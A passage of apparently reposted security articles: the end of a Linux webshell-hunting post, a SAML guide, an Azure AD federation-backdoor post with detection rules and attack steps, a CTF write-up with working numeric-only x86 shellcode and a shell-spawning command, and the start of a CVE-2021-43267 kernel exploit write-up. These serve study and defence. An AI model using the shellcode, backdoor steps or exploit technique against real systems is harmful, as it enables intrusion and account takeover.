| 17770 | 6.7.8.9        | 22         | 20901       | ESTABLISHED | sshd            | sshd: user@pts/0                       | 1000 | user     |
| 17776 | 1.2.3.4        | 51998      | 1337        | ESTABLISHED | bash            | bash                                   | 33   | www-data |
+-------+----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+
```

Notice that we see exposed ports 22 and 80, which is normal. We see outbound connections from some binaries used by GCP (my VM is hosted in GCP), as well as from the auditbeat service that ships my logs to the SIEM. We also see an active SSH connection from 6.7.8.9, which might be normal. What should catch your eye is the connection with pid = 17776: an outbound connection to port 1337, running a shell as www-data! This is probably an active reverse shell!

What's next

We've discussed the basics of monitoring and logging with sysmon, osquery, auditd and auditbeats, using the creation and usage of web shells as a case study. In the next blog post we will go through account creation and manipulation.
Appendix

A00 Setup nginx and php

If you want to try this out on your own VM, you first need to set up an nginx server that is configured to use php (we follow this guide). Install nginx and php:

```
sudo apt-get update
sudo apt-get install nginx
sudo apt-get install php-fpm

sudo vi /etc/php/7.3/fpm/php.ini
# cgi.fix_pathinfo=0
sudo systemctl restart php7.3-fpm

sudo vi /etc/nginx/sites-available/default
# configure nginx to use php, see next codeblock
sudo systemctl restart nginx
```

The nginx config might look something like this:

```
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
    }
}
```

Now you should have a web server listening on port 80 that can run php code. Any file that ends with .php will be run as php code.

A01 Setup sysmon for linux

For sysmon for Linux, I was on Debian 10, so based on https://github.com/Sysinternals/SysmonForLinux/blob/main/INSTALL.md:

```
wget -qO- https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.asc.gpg
sudo mv microsoft.asc.gpg /etc/apt/trusted.gpg.d/
wget -q https://packages.microsoft.com/config/debian/10/prod.list
sudo mv prod.list /etc/apt/sources.list.d/microsoft-prod.list
sudo chown root:root /etc/apt/trusted.gpg.d/microsoft.asc.gpg
sudo chown root:root /etc/apt/sources.list.d/microsoft-prod.list
sudo apt-get update
sudo apt-get install apt-transport-https
sudo apt-get update
sudo apt-get install sysmonforlinux
```

I used microsoft/MSTIC-Sysmon:

```
git clone https://github.com/microsoft/MSTIC-Sysmon.git
cd MSTIC-Sysmon/linux/configs
sudo sysmon -accepteula -i main.xml
# if you are experimenting and want to see all sysmon logs use
# sudo sysmon -accepteula -i main.xml
```

Logs should now be available in /var/log/syslog.

If you want to add rules to main.xml, you can modify it, then reload the config and restart sysmon:

```
sudo sysmon -c main.xml
sudo systemctl restart sysmon
```

A02 Setup auditbeats and auditd for linux

Note: Setting up a local elasticsearch cluster is out of scope for this blog post. Elastic has good documentation for auditbeats: https://www.elastic.co/guide/en/beats/auditbeat/7.15/auditbeat-installation-configuration.html

```
curl -L -O https://artifacts.elastic.co/downloads/beats/auditbeat/auditbeat-7.15.2-amd64.deb
sudo dpkg -i auditbeat-7.15.2-amd64.deb
```

Modify /etc/auditbeat/auditbeat.yml and add the config for elasticsearch:

```
output.elasticsearch:
  hosts: ["10.10.10.10:9200"]
  username: "auditbeat_internal"
  password: "YOUR_PASSWORD"
```

To configure auditd rules, validate the location of the audit_rule_files:

```
# ...
- module: auditd
  audit_rule_files: [ '${path.config}/audit.rules.d/*.conf' ]
  audit_rules: |
    ## Define audit rules
# ...
```

In this case it is /etc/auditbeat/audit.rules.d/, and I add audit-rules.conf from https://github.com/Neo23x0/auditd/blob/master/audit.rules. Some of the custom rules I make I add in /etc/auditbeat/audit.rules.d/custom.conf.

Other sources:
- https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-linux-version-of-the-windows-sysmon-tool/
- https://github.com/elastic/integrations/issues/1930

Photo by Brook Anderson on Unsplash

Pepe Berba
Cloud Security at Thinking Machines | GMON, CCSK | Ex-Machine Learning Researcher and Ex-SOC Engineer

Sursa: https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/
  4. A Complete Guide to Implementing SAML Authentication in Enterprise SaaS Applications
     Identity | Aviad Mizrachi | 7 min read | July 15, 2021

What Is SAML Authentication?

SAML stands for Security Assertion Markup Language. Say an organization wishes to authenticate its users without creating IAM roles, and to communicate assertions between the source and the target in a cloud environment: this can easily be achieved with the help of SAML.

SAML is a method of secure communication between parties using Extensible Markup Language (XML). The following two endpoints are typically used in SAML:
- Identity provider: The source that makes the request is known as the "identity provider", and the user's identity might be either username/password or username/OTP.
- Service provider: The "service provider" is the target to which the initiated request is directed for verification; it may be Gmail, AWS, or Salesforce. It keeps track of user permission records and grants access to Software as a Service (SaaS) applications. It also keeps track of how long a user is permitted to stay, or how to keep a user's session on a certain application alive.

SAML is built on the notion of single sign-on (SSO): one can use the same credentials on all of an organization's portals to which they have access. SAML can also be used for access control list (ACL) permissions, where it determines whether or not a user is authorized to access a specific resource. There's also SAML 2.0, a version of the SAML standard that enables web-based, cross-domain SSO; it was ratified back in 2005.

Benefits of SAML
- For users and systems built independently by an organization, SAML enables both authentication and authorization.
- There is no need to use or remember numerous credentials once it is implemented; a single set of credentials can access all of the organization's resources or systems.
- SAML follows a standard methodology that is not dependent on any particular system, so it has no interoperability concerns across different products and vendors.
- It uses a single point of entry to validate a user's identity, allowing it to provide secure authentication without keeping user data or requiring directory synchronization. As a result, it reduces the possibility of identity theft.
- The SSO principle provides a hassle-free and speedier environment for its users.
- Administrative costs are lowered for service providers: because separate authentication endpoints aren't required, there's no need to develop them.
- It makes the system more dependable in terms of "risk transference", because it transfers responsibility based on identity.

SAML vs. OAuth

OAuth stands for "Open Authorization". OAuth, like SAML, employs an authorization server to complete the login process, and both are based on the SSO principle. Let's look at some of the fundamental differences between them.

SAML is concerned with the user, whereas OAuth is concerned with the application. Users are managed centrally in SAML: when a user logs into their organization's network, they have access to all the resources because everything is centralized. However, if a user wants to give third-party websites access to their information from a website like Facebook or Google, OAuth is required.
SAML can do both authentication and authorization, whereas OAuth can only do the latter. OAuth is based on JavaScript Object Notation (JSON), binary, or even SAML formats, whereas SAML is based on XML. In SAML, a token is referred to as a SAML assertion; in OAuth, a token is referred to as an access token. If users need temporary access to resources, use OAuth instead of SAML, because it is more lightweight.

How SAML Authentication Works

1. The identity provider obtains the user's credentials (username and password). SAML validates the user's identity at this stage.
2. The identity provider now verifies the credentials and permissions associated with that account.
3. If the user's credentials are correct, the identity provider responds with a token and the user's approved response to access the SaaS application.
4. This token is sent to the service provider using a POST request.
5. The service provider now validates the token. If the token is valid, it generates temporary credentials and directs the user to the desired application endpoint.

Note: The steps listed above will only work if there is a "trust connection" between the identity provider and the service provider. The authentication process will fail if that does not exist.

How We Can Create a Trust Relationship between Identity Provider and Service Provider

The SAML basic configuration must be agreed upon by both the identity provider and the service provider. An identical configuration is required at both endpoints; otherwise, SAML will not work.

How it works: Create a SAML document and submit it to the service provider; this document is in XML format. We must first generate a certificate on the host machine. Similarly, generate a document on the service provider and then import it on the identity provider. That document carries a lot of information, such as certificate details, the organization's email address, and the public key of the service provider.
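The certificate step can be as simple as a self-signed key pair. A minimal sketch (assuming OpenSSL is available; the subject name is illustrative):

```bash
# Generate the private key and self-signed certificate an IdP typically
# uses to sign SAML assertions, and which the SP imports to verify them.
openssl req -x509 -newkey rsa:2048 -nodes \
    -keyout idp-key.pem -out idp-cert.pem \
    -days 365 -subj "/CN=idp.example.com"
```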
SAML Use Cases

When an organization implements SAML, it can do so in a variety of ways. For example, all infrastructure can be deployed on-premises, in the cloud, or in a hybrid structure where part of it is in the cloud and part is on-premises. We have a couple of use cases based on this.

Hybrid

In this situation, identity verification takes place on-premises, but authorization takes place in the cloud, and the user reaches the cloud resource directly before authentication. Then:
1. Users access cloud resources directly.
2. For authentication, users are redirected to the on-premises setup.
3. The identity provider verifies the user's identity and provides the SAML assertion for the service provider's use.
4. The service provider validates the assertion, and the user is sent to the web application.

Cloud-Based

Both the identity provider and the service provider are cloud-based in this scenario, and the apps are either cloud-based or on-premises.
1. First, users are redirected to the cloud infrastructure to verify their identity. Identity as a Service (IDaaS) is the term used to describe identity providers that work this way.
2. Authentication is handled by the identity provider.
3. The identity provider issues assertions after authentication.
4. The service provider verifies the veracity of the assertion and grants the user access to the web application.

How to Implement SAML on the Cloud

It is relatively simple to deploy SAML in the cloud, because most cloud service providers now offer an option to do so automatically; you don't need to know rocket science to do it. Here, we discuss how you can implement SAML on Google Cloud.

Step 1: Create an account on Google Cloud and enable the identity provider.

Step 2: Now it's time to set up the provider; there are a few things to do:
- Go to Identity Provider -> Click on Add Provider -> Select SAML from the list -> Enter details such as Provider Name, Provider's Entity ID, Provider's SSO URL, Certificate (used for token signing).
- Go to Service Provider -> Provide the Entity ID (that identifies your application).

Step 3: Add the application URL to the authorized domains.

Step 4: After adding all this information in the different places, click Save.

These are some basic cloud measures that we can use. However, we can take the steps listed below to secure it further:
- Signing requests: By signing authentication requests, this feature improves the security of the requests.
- Linking user accounts: There's a chance the user has already signed into the application, but with a different method than username/password. In such a scenario, we can link the existing account to the SAML provider.
- Re-authenticating users: When a user changes their email, password, or any other sensitive information, it is the obligation of the SAML flow to re-authenticate the user.

SAML Authentication Best Practices

Although we discussed the fundamentals of SAML, there are other practices that make SAML communication more secure:
- Always use SSL/TLS for web communication, so that all traffic between users, identity providers, and service providers is encrypted at all times. Since the communication is encrypted, an attacker attempting a MITM attack will be unable to read or modify the data; the requests' confidentiality and integrity are preserved.
- When creating a trust relationship between identity providers and service providers, configure identity providers to use HTTP POST, and use whitelisted domains for the redirection of SAML responses. The service provider does not perform the authentication operation; if the domain is not whitelisted, attackers can manipulate it and redirect users to a malicious domain.
- SAML uses XML schema validation on XML documents so that unsanitized user input cannot pass. Always prefer a local schema for XML; do not download it from untrusted websites.
- Maintain a blacklist of the domains that the organization wants to exclude from the SAML authentication process.
- As an identity provider, manage users through access control.

Aviad Mizrachi

Sursa: https://frontegg.com/blog/implementing-saml-authentication-in-enterprise-saas-applications
  5. How to Detect Azure Active Directory Backdoors: Identity Federation
     November 23, 2021

During the SolarWinds breach performed by Russian threat actors, one of the techniques utilised to gain control of a victim's Azure Active Directory (AAD) was to create an AAD backdoor through identity federation. The implication of this attack was that the threat actors were able to log in and impersonate any Microsoft 365 (M365) user, bypassing all requirements for MFA as well as any need to enter a valid password. As you can imagine, if the correct detection controls are not in place, this allows the threat actors to persist, impersonating any user and maintaining access and control of the victim's AAD / M365 instance.

Backdooring AAD is a technique that tends to be used post-compromise, whereby an attacker has already gained access to an account with Global Administrator or Hybrid Identity Administrator privileges. As such, it's crucial that organisations monitor for accounts being given these two privileges. There are many ways an attacker can gain Global Administrator privileges within AAD; one of those techniques is privilege escalation via service principals with an owner who has Global Administrator privileges. I have written a previous blog post covering backdooring Azure applications and service principal abuse here.

The intention of this blog post is to cover how to create an Azure AD backdoor utilising the AADInternals tool by @DrAzureAD, the AAD portal and the MSOnline PowerShell module. I've broken this blog post into two sections: the first focusing on the detection and the second on the attack flow.

Detection Methodology

To detect a malicious AAD backdoor, there are four key elements to consider in the analysis methodology:
1. Review all federated domain names within AAD
2. Review audit logs and unified audit logs for any newly federated domains
3. Review audit logs for ImmutableIds being added/created for an account
4. Review all anomalous logons in the Azure sign-in logs and the unified audit logs (UAL)

Step 1: Reviewing Federated Domain Names

Within the AAD portal, the "Custom Domain Names" section lists all domains that are relevant to the instance. In this particular section, I would advise reviewing all domains that have the "federated" tick next to them.
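If you prefer to enumerate this outside the portal, the same information is exposed through Microsoft Graph. A sketch (assumes a token with permission to read domains, e.g. Domain.Read.All, and that curl and jq are available):

```bash
# List all domains in the tenant and print the ones set up for federation.
curl -s -H "Authorization: Bearer $TOKEN" \
     "https://graph.microsoft.com/v1.0/domains" |
  jq -r '.value[] | select(.authenticationType == "Federated") | .id'
```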
Step 2: Detect any newly federated domains in AAD

Both the AAD audit logs and the unified audit logs will track activity pertaining to the creation of a newly federated domain. These events should not occur frequently, so setting up an alert on this should not generate much noise. Since AAD stores audit log and sign-in log activity for only 7-30 days, depending on the license, I'd also recommend setting up the same detection on the unified audit logs. The detection should look for a match on the following fields:

```
Activity: "Set domain authentication"
IssuerURI: "http://any.sts/*"
LiveType: "Federated"
```

The screenshot below shows how this is represented within the audit logs in the portal. Further review of the audit logs should show a sequence of activity pertaining to the verification of the malicious domain, along with the federation activity. I would also hunt for the following activities:

```
Verify domain: Success or Failure
Add unverified domain: Success
```

Step 3: Detecting modifications to ImmutableIDs for accounts

For a backdoor to be set, the impersonated user with Global Admin / Hybrid Identity Admin credentials needs to have an ImmutableID set. This creates an event in the AAD audit logs. I would write a detection that looks for:

```
Activity: "Update User"
Included Updated Properties: "SourceAnchor"
```

As you can see from the screenshot below, the ImmutableID I created was "happyegg". By detecting the existence of "Included Updated Properties" mapping to "SourceAnchor", you can detect the creation/modification of the ImmutableID.

Step 4: Review anomalous sign-ins

It's difficult to review the AAD sign-in logs to ascertain this behaviour, as the attackers can impersonate basically any user and log in; the premise of the backdoor is that the attackers can bypass MFA. When I performed this attack on my test instance, it generated events with details that shouldn't be too common for a user. However, these logon events can vary and can generate false positives — I would keep this in mind before turning this into a detection query. You can also focus on detecting general anomalous sign-ins that match other IoCs collected (IPs, user-agent strings, etc.) within the unified audit logs (UAL).

Attack Methodology

This next section focuses on how to perform this attack. I relied heavily on the documentation written by @DrAzureAD in his blog here. I did this a little differently, but you can also do the entire thing using just AADInternals.

Step 1: Set the ImmutableID string for the user you want to impersonate

In order for this attack to work, the user you are impersonating needs to have an ImmutableID set. I used the MSOnline module for this section. I first ran a check to see if there were any existing ImmutableIDs set in my tenant. The account I wanted to target is my global administrator account, so using MSOnline I set an ImmutableID of "happyegg" for that account.

Step 2: Register a malicious domain

For this to work, you need to register/create a malicious domain that you can use as your backdoor. I followed @DrAzureAD's recommendation and generated a free one using www.myo365.site, called "evildomain.myo365.site". I decided to add the domain to my tenant via the AAD portal. You can do this by clicking into "Custom domain names" and adding your custom domain name there. It will guide you through a verification check, where you will need to ensure that the malicious domain you created has the same TXT field as the one issued by Microsoft. The Microsoft documentation for how to add a custom domain name is here.

Step 3: Create the AAD backdoor

I used AADInternals to do this the same way @DrAzureAD detailed in his blog. This provides you with an IssuerURI, which you will then utilise to log in.

Step 4: Login through your AAD backdoor

Using AADInternals again, I logged in. As you can see in the screenshot below, it automatically opens a browser and shows the "Stay signed in?" page. By clicking "YES" you are automatically taken into M365, logged in as that user. Attack complete!
References
- https://o365blog.com/post/aadbackdoor/
- https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoluser?view=azureadps-1.0
- https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-custom-domain
- https://docs.microsoft.com/en-us/powershell/module/msonline/?view=azureadps-1.0

Sursa: https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
  6. Numeric Shellcode
     Jan 12, 2021 · 10 minutes read

Introduction

In December 2020 I competed in Deloitte's Hackazon CTF competition. Over the course of 14 days they released multiple troves of challenges of varying difficulty. One of the final challenges to be released was called numerous presents. This task immediately piqued my interest, as it was tagged with the category pwn. The challenge description reads:

600 POINTS - NUMEROUS PRESENTS
You deserve a lot of presents!
Note: The binary is running on a Ubuntu 20.04 container with ASLR enabled. It is x86 compiled with the flags mentioned in the C file. You can assume that the buffer for your shellcode will be in eax.
Tip: use hardware breakpoints for debugging shellcode.

Challenge code

The challenge is distributed as a .c file with no accompanying reference binary. Personally I'm not a big fan of this approach — the devil is in the details when it comes to binary exploitation — but let's have a look:

```c
#include <stdio.h>

// gcc -no-pie -z execstack -m32 -o presents presents.c

unsigned char presents[123456] __attribute__ ((aligned (0x20000)));

int main(void)
{
    setbuf(stdout, NULL);
    puts("How many presents do you want?");
    printf("> ");
    scanf("%123456[0-9]", presents);
    puts("Loading up your presents..!");
    ((void(*)())presents)();
}
```

Alright, at least the invocation for gcc is embedded as a comment, and the challenge code itself is brief and straightforward. There is a static uninitialized buffer presents that resides in the .bss of the program. The libc routine scanf is used to fill this buffer and jump to it. There is one catch though: the format string used here is %123456[0-9]. This uses the %[ specifier to restrict the allowed input to only the ASCII literals for the digits 0 through 9 (0x30-0x39).

So essentially they are asking us to write a numeric-only shellcode for x86 (not amd64). Is this even possible? There is plenty of supporting evidence that this is possible when restricted to alphanumeric characters, but what about numeric-only? Long story short: yes, it is definitely possible. In the remaining part of the article I will explain the approach I took. Unfortunately, this is not a fully universal or unconstrained approach, but it is good enough™ for this particular scenario.

Diving in

If we set up a clean Ubuntu 20.04 VM, apt install build-essential, and build the provided source, we end up with a binary which has the presents global variable located at 0x08080000. Examining the disassembly listing of main, we can see the function pointer invocation looks like this:

```
mov eax, 0x8080000
call eax
```

So indeed, as the challenge description suggested, EAX contains a pointer to our input/shellcode. So what kind of (useful) instructions can we generate with just 0x30-0x39? Instead of staring at instruction reference manuals and handy tables for too long, I opted to brute-force generate valid opcode permutations and disassemble+dedup them.

Exclusive ORdinary Instructions

There were no easy instructions to do flow control with numerics only, let alone a lot of the arithmetic. There was no way to use the stack (push/pop) as some kind of scratchpad memory, as is often seen with alphanumeric shellcoding. Let's look at some obviously useful candidates though… they are all xor operations:

```
34 xx          -> xor al, imm8
30 30          -> xor byte ptr [eax], dh
32 30          -> xor dh, byte ptr [eax]
32 38          -> xor bh, byte ptr [eax]
35 xx xx xx xx -> xor eax, imm32
```

Of course, any immediate operands have to be in the 0x30-0x39 range as well.
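The article doesn't include the generator itself, but the brute-force idea is easy to sketch in shell (this assumes binutils' objdump is installed; for brevity it only enumerates the 100 two-byte numeric pairs):

```bash
# Disassemble every 2-byte combination of numeric bytes (0x30-0x39)
# as 32-bit x86 and list the unique instructions they decode to.
for a in {48..57}; do
  for b in {48..57}; do
    printf "$(printf '\\x%02x\\x%02x' "$a" "$b")" > /tmp/pair.bin
    objdump -D -b binary -m i386 -M intel /tmp/pair.bin |
      grep -E '^[[:space:]]+[0-9a-f]+:' | cut -f3
  done
done | sort -u
```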
But these instructions provide a nice starting point. xor byte ptr [eax], dh can be used to (self-)modify code/data if we manage to point eax at the code/data we want to modify. Changing eax arbitrarily is a bit tricky, but with the help of xor eax, imm32 and xor al, imm8 we can create quite a few usable addresses. (More on this in a bit.)

Writing numeric-only shellcode is all about expanding your arsenal of primitives in a way that eventually yields the desired end result. If we were to start mutating opcodes/instructions using the xor [eax], dh primitive, we need to have a useful value in dh first.

Bootstrapping

If we look at the register contents of ebx and edx in the context of this particular challenge, we see that ebx points to the start of the .got.plt section (0x0804c000) and edx is clobbered with the value 0xffffffff at the time the trampoline instruction (call eax) to our shellcode is executed. In short, bh = 0xc0 and dh = 0xff.

If we start our journey like this:

xor byte ptr [eax], dh ; *(u8*)(eax) ^= 0xff (== 0xcf)
xor dh, byte ptr [eax] ; dh ^= 0xcf (== 0x30)
xor bh, byte ptr [eax] ; bh ^= 0xcf (== 0x0f)

we end up with some (what I would call) useful values in both dh and bh. What exactly makes 0x30 and 0x0f useful though? Well, for one, by xor'ing numeric code with 0x30 we can now (relatively) easily introduce the values 0x00-0x09.

To be able to arbitrarily carve certain bytes in memory I picked a method that relies on basic add arithmetic. add byte ptr [eax], dh and add byte ptr [eax], bh are almost numeric-only; they start with a 0x00 opcode byte though. But this value can now be carved by xor'ing with dh, which contains 0x30. Here it becomes useful that we have a value in dh which only has bits set in the upper nibble, and a value in bh which only has bits set in the lower nibble. By combining a (reasonable!) amount of add arithmetic using bh and dh as increment values, we can carve any value we want.

So let's say we want to produce the value 0xCD (CD 80 happens to be a useful sequence of bytes when writing x86/Linux shellcode ;-)):

start value = 0x31
0x31 + (0x30 * 2) = 0x91
0x91 + (0x0f * 4) = 0xcd

As you can see, with a total of 6 add operations (2 with dh and 4 with bh) we can easily construct the value 0xCD if we start with a numeric value of 0x31. It is fine if we overflow; we are only working with 8-bit registers.
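The carving arithmetic is easy to automate. Here's a tiny sketch (my own illustration) that searches, modulo 256, for the cheapest mix of +0x30 (dh) and +0x0f (bh) steps turning a numeric start byte into a target byte:

def carve(start, target):
    """Return (a, b): counts of 'add [eax], dh' (+0x30) and
    'add [eax], bh' (+0x0f) steps, minimizing the total count."""
    best = None
    for a in range(256):
        for b in range(256):
            if (start + 0x30 * a + 0x0f * b) & 0xff == target:
                if best is None or a + b < sum(best):
                    best = (a, b)
    return best

print(carve(0x31, 0xcd))  # -> (2, 4), matching the chain above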
A quick example would look something like this:

; eax = 0x08080000, our starting address
xor eax, 0x30303130 ; eax = 0x38383130
xor eax, 0x30303030 ; eax = 0x08080100
xor al, 0x30        ; eax = 0x08080130

Let's treat the lower 16 bits of eax as our selectable address space: we have the ability to select addresses of the form 0x08080xyz, where x and z can be anything between 0 and f and y can be either 3 or 0. In essence, we can easily increase/decrease eax with a granularity of 0x100, and within each 0x100-sized page (from here on, page) we can select addresses 00-0f and 30-3f.

I came up with a structure for the shellcode where each page starts with code that patches code in the same page at offset 0x30 and higher, and the code at offset 0x30 and higher in the page then patches the final shellcode. Indeed, we're using self-modifying code that needs to be self-modified before it can self-modify (yo dawg). Roughly, the layout of our pages looks like this:

000: setup code
100: page_patcher_code_0 (patches shellcode_patcher_code_0)
130: shellcode_patcher_code_0 (patches shellcode)
200: page_patcher_code_1 (patches shellcode_patcher_code_1)
230: shellcode_patcher_code_1 (patches shellcode)
...
f00: shellcode that gets modified back into original form

This means we can have a maximum of up to 14 patch pages (we lose page 0 to setup code), which doesn't allow us to use very big shellcodes. However, as it turns out, this is enough for a read(stdin, buffer, size) syscall, which was good enough to beat this challenge and (in general) is enough for staging a larger shellcode.

Padding

With our limited addressing there's quite a bit of 'dead' space we can't easily address for modifying. We'll have to find some numeric-only nop operation so we can slide over these areas. Most of our numeric instructions are exactly 2 bytes, except for xor eax, imm32 which is 5 bytes. The xor eax, imm32 is always used in pairs though, so our numeric code size is always evenly divisible by 2. This means we can use a 2-byte nop instruction and not run into any alignment issues. I picked cmp byte ptr [eax], dh (38 30) as my NOP instruction, as eax always points to a mapped address and the side effects are minimal. Another option would've been the aaa instruction (37), which is exactly 1 byte in size. But it clobbers al in some cases, so I avoided it.

Putting it all together

Initially, while I was developing this method, I manually put together these self-modifying numeric-only contraptions (well, with some help from GNU assembler macros)... which works, but is quite a painful and error-prone process. Eventually I implemented all the details in an easy-to-use Python script, numeric_gen.py. This tool takes care of finding the right xor masks for address selection (sketched below) and calculating the optimal amount of mutation instructions for generating the shellcode. Do note, this tool was written for the exact challenge I was facing. You'll want to modify the three constants (EDX, EBX, EAX) at the top if you plan to reuse my tooling.

Popping a shell

So we'll write a quick stager shellcode that is compact enough to be num-only-ified. It will use the read syscall to read the next stage of shellcode from stdin. We'll put the destination buffer right after the stager itself, so there's no need for trailing nop instructions or control flow diversion. The careful reader will notice I'm not setting edx (which contains the size argument for the read syscall) here, since it's already set to a big enough value.
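As an aside, the xor-mask search for address selection boils down to a byte-wise search, since xor has no carries. A hypothetical sketch of what numeric_gen.py has to solve (my illustration, not the actual tool): find two all-numeric imm32 masks whose combined xor bridges the current and target eax values.

def xor_masks(cur, target):
    lo, hi = [], []
    for shift in (0, 8, 16, 24):
        want = ((cur ^ target) >> shift) & 0xff
        for b1 in range(0x30, 0x3a):
            b2 = want ^ b1
            if 0x30 <= b2 <= 0x39:
                lo.append(b1)
                hi.append(b2)
                break
        else:
            return None  # byte not bridgeable with two numeric masks
    return (int.from_bytes(bytes(lo), "little"),
            int.from_bytes(bytes(hi), "little"))

# 0x08080000 -> 0x08080100, as in the example above
print([hex(m) for m in xor_masks(0x08080000, 0x08080100)])

Two numeric bytes can only xor into 0x00-0x0f (their high nibbles cancel), which is exactly why the optional trailing xor al, 0x30 exists: it handles the 0x30 toggle the masks can't. With that out of the way, on to the stager: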
bits 32

global _start

_start:
    mov ecx, eax    ; ecx = eax
    add ecx, 0xd    ; ecx = &_end
    xor ebx, ebx    ; stdin
    xor eax, eax
    xor al, 3       ; eax = NR_read
    int 0x80
_end:

That should do the trick. Time to run it through the tool and give it a shot.

$ nasm -o stager.bin stager.asm
$ xxd stager.bin
00000000: 89c1 83c1 0d31 db31 c034 03cd 80         .....1.1.4...
$ python3 numeric_gen.py stager.bin stager_num.bin
[~] total patch pages: 14
[>] wrote numeric shellcode to 'stager_num.bin'
[~] old length: 13 bytes, new length 3853 (size increase 29638.46%)
$ xxd stager_num.bin
00000000: 3030 3230 3238 3530 3030 3035 3031 3030  0020285000050100
00000010: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000020: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000030: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
...
00000ee0: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000ef0: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000f00: 3931 3531 3231 3031 3034 3431 32         9151210104412
$ xxd binsh.bin
00000000: 31c0 89c2 5068 6e2f 7368 682f 2f62 6989  1...Phn/shh//bi.
00000010: e389 c1b0 0b52 5153 89e1 cd80            .....RQS....
$ (cat stager_num.bin; sleep 1; cat binsh.bin; cat -) | ./presents
How many presents do you want?
> Loading up your presents..!
id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
echo w00t
w00t
^C

Success! As you can see, our final numeric shellcode weighs in at 3853 bytes: a little under 4KiB, and well within the allowed limit of 123456 characters.

Closing words

I hope you enjoyed this article, and I'm eager to hear what improvements others can come up with. Right now this is not a fully generic approach, and I have no personal ambitions to turn it into one either. Things like shellcode encoding are mostly a fun party trick anyway these days. 😉

– blasty

Source: https://haxx.in/posts/numeric-shellcode/
  7. Exploiting CVE-2021-43267

Nov 24, 2021 - 11 minutes read

Introduction

A couple of weeks ago a heap overflow vulnerability in the TIPC subsystem of the Linux kernel was disclosed by Max van Amerongen (@maxpl0it). He posted a detailed writeup about the bug on the SentinelLabs website. It's a pretty clear-cut heap buffer overflow where we control the size and data of the overflow. I decided I wanted to embark on a small exploit dev adventure to see how hard it would be to exploit this bug on a kernel with common mitigations in place (SMEP/SMAP/KASLR/KPTI). If you came here to find novel new kernel exploitation strategies, you picked the wrong blogpost, sorry!

TIPC?

To quote the TIPC webpage:

Have you ever wished you had the convenience of Unix Domain Sockets even when transmitting data between cluster nodes? Where you yourself determine the addresses you want to bind to and use? Where you don't have to perform DNS lookups and worry about IP addresses? Where you don't have to start timers to monitor the continuous existence of peer sockets? And yet without the downsides of that socket type, such as the risk of lingering inodes?

Well... I have not. But then again, I'm just an opportunistic vulndev person. Welcome to the Transparent Inter Process Communication service, TIPC in short, which gives you all of this, and a lot more. Thanks for having me.

How to tipc-over-udp?

In order to use the TIPC support provided by the Linux kernel, you'll have to compile a kernel with TIPC enabled or load the TIPC module which ships with many popular distros. To easily interface with the TIPC subsystem you can use the tipc utility, which is part of iproute2. For example, to list all the node links you can issue tipc link list.

We want to talk to the TIPC subsystem over UDP, and for that we'll have to enable the UDP bearer media. This can be done using tipc bearer enable media udp name <NAME> localip <SOMELOCALIP>. Under the hood, the tipc userland utility uses netlink messages (using address family AF_TIPC) to do its thing. Interestingly enough, these netlink messages can be sent by any unprivileged user. So even if there's no existing TIPC configuration in place, this bug can still be exploited.

How to reach the vulnerable codepath?

So now we know how to enable the UDP listener for TIPC, but how do we go about actually reaching the vulnerable code? We'll have to present ourselves as a valid node and establish a link before we can trigger the MSG_CRYPTO codepath. We can find a protocol specification on the TIPC webpage that details everything about transport, addressing schemes, fragmentation and so on. That's a lot of really dry stuff though. I made some PCAPs of a tipc-over-udp session setup and, with some handwaving and reading the kernel source, narrowed it down to a few packets we need to emit before we can start sending the messages we are interested in.

In short, a typical TIPC datagram starts with a header that consists of at least six 32-bit words in big endian byte order. Those are typically referred to as w0 through w5. This header is (optionally) followed by a payload. w0 encodes the TIPC version, header size, payload size, and the message 'protocol'. There's also a flag which indicates whether this is a sequential message or not. w1 encodes (amongst other things) a message type specific to the protocol. The header also specifies a node_id in w3, which is a unique identifier a node includes in every packet. Typically, nodes encode their IPv4 address to be their node_id.
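To make the header layout concrete, here's a hedged sketch of packing w0-w5 and shipping them over the UDP bearer. The bit positions are paraphrased from net/tipc/msg.h and worth double-checking against your kernel; 6118/udp is the registered TIPC port, and the addresses are placeholders:

import socket
import struct

def tipc_hdr(user, mtype, hsize, msize, node_id):
    # w0: version (2) | user/'protocol' | header size in words | message size
    w0 = (2 << 29) | (user << 25) | ((hsize >> 2) << 21) | (msize & 0x1ffff)
    w1 = mtype << 29            # message type lives in the top bits of w1
    w3 = node_id                # sender identity, conventionally the IPv4 addr
    return struct.pack(">6I", w0, w1, 0, w3, 0, 0)

LINK_CONFIG = 13                # user id from net/tipc/msg.h (double-check)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
pkt = tipc_hdr(user=LINK_CONFIG, mtype=0, hsize=24, msize=24,
               node_id=0xc0a80101)          # 192.168.1.1 as node id
s.sendto(pkt, ("192.168.1.10", 6118))       # target's UDP bearer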
A quick way to learn about the various bitfields of the header format is by consulting net/tipc/msg.h.

To establish a valid node link we send three packets:

protocol: LINK_CONFIG   -> message type: DSC_REQ_MSG
protocol: LINK_PROTOCOL -> message type: RESET_MSG
protocol: LINK_PROTOCOL -> message type: STATE_MSG

The LINK_CONFIG packet advertises us to the peer. The link is then reset with the LINK_PROTOCOL packet that has the RESET_MSG message type. Finally, the link is brought up by sending a LINK_PROTOCOL packet with the STATE_MSG message type. Now we are actually in a state where we can send MSG_CRYPTO TIPC packets and start playing with the heap overflow bug.

Corrupting some memories

A MSG_CRYPTO TIPC packet payload looks like this:

struct tipc_aead_key {
    char alg_name[TIPC_AEAD_ALG_NAME];
    unsigned int keylen;
    char key[];
};

